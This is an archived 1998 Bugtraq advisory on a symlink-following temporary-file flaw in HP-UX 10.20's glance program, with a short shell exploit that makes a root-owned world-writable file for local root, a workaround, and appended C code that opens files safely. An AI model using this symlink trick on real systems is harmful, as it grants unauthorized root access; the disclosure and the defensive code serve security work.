Yet ANOTHER hole in the HP/UX Glance program
| Field | Value |
| --- | --- |
| Description | Standard symlink-following TMPFILE stupidity |
| Author | "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES> |
| Compromise | root (local) |
| Vulnerable Systems | HP/UX 10.20, perhaps other versions |
| Date | 27 April 1998 |
Date: Mon, 27 Apr 1998 23:31:12 +0200
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
To: BUGTRAQ@NETSPACE.ORG
Subject: HP-UX glance bug (#4?)
    * Software:
      HP-UX B.10.20 D
      Glance.Runtime.GLANCE                 B.10.20.95     HP GlancePlus files

    * Bug:
      glance creates a /tmp/status.dce file as root, and it follows
      symlinks, so you can append text like

        Pid: 16208  File: ndi_sm.c         Line:   2609   Mon Apr 27 21:52:23 1998
        Performance Management Application registered.
        --------------------------------------------------------------------------

      to any system file.

    * Sample exploit:
        $ umask 000
        $ cd /tmp
        $ ln -s /.test status.dce
        $ glance -j 1 -iterations 1 -maxpages 1
        $ ls -l /.test
        -rw-rw-rw-   1 root       bar           1080 Apr 27 23:06 /.test
        # edit /.test to match your needs

    * Workaround:
      I guess creating a non-writable /tmp/status.dce file
      and setting the t bit on /tmp (which it seems it does not
      have in the default HPUX installation) would be enough.

    * Note: I've been looking for HP-UX bugs, and I have found
      several reported holes in glance; but it seems this one
      is new...
--
    J.A. Gutierrez                                   So be easy and free
                                            when you're drinking with me
                                      I'm a man you don't meet every day
 finger me for PGP                                          (the pogues)
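Added here as a defender's illustration, not code from the post or from HP: a C routine that opens a root-written status file without following a planted symlink, plus the sticky-bit check the workaround relies on, exercised against a constructed scratch directory. It assumes O_NOFOLLOW is available (POSIX.1-2008; HP-UX 10.20 did not have it), and the /tmp/glance-demo-* paths and file names are constructed for the demo.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>
/* The "t bit" of the workaround: with it set, only an entry's owner (or root)
 * may remove or rename it in /tmp, so nobody else can swap in a symlink. */
int dir_has_sticky_bit(const char *dir) {
    struct stat st;
    if (stat(dir, &st) != 0 || !S_ISDIR(st.st_mode)) return -1;
    return (st.st_mode & S_ISVTX) ? 1 : 0;
}

/* Open a status file for appending without following a planted symlink:
 * O_NOFOLLOW rejects a symlink, O_EXCL closes the create race, and fstat()
 * rejects anything that is not a plain file owned by the caller. */
int open_status_file_safely(const char *path) {
    int fd = open(path, O_WRONLY | O_APPEND | O_NOFOLLOW);
    if (fd < 0 && errno == ENOENT)
        fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_EXCL | O_NOFOLLOW, 0644);
    if (fd < 0) return -1;
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != geteuid()) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed scenario mirroring the post: status.dce in a scratch directory
 * is a symlink to a stand-in "system file". Returns 1 if the safe opener
 * refused it, left the target empty, and still opened a plain file. */
int demo_symlink_is_rejected(void) {
    char dir[] = "/tmp/glance-demo-XXXXXX", target[64], name[64];
    if (mkdtemp(dir) == NULL) return 0;
    snprintf(target, sizeof target, "%s/system-file", dir);
    snprintf(name, sizeof name, "%s/status.dce", dir);
    int tfd = open(target, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (tfd < 0 || close(tfd) != 0 || symlink(target, name) != 0) return 0;
    int rejected = open_status_file_safely(name) < 0;
    struct stat st;
    int untouched = stat(target, &st) == 0 && st.st_size == 0;
    snprintf(name, sizeof name, "%s/status.real", dir);
    int fd = open_status_file_safely(name);
    int works = fd >= 0 && write(fd, "ok\n", 3) == 3;
    if (fd >= 0) close(fd);
    return rejected && untouched && works;
}
```

The scratch directory is left in place so the result can be inspected with ls -l, the same way the post checks /.test.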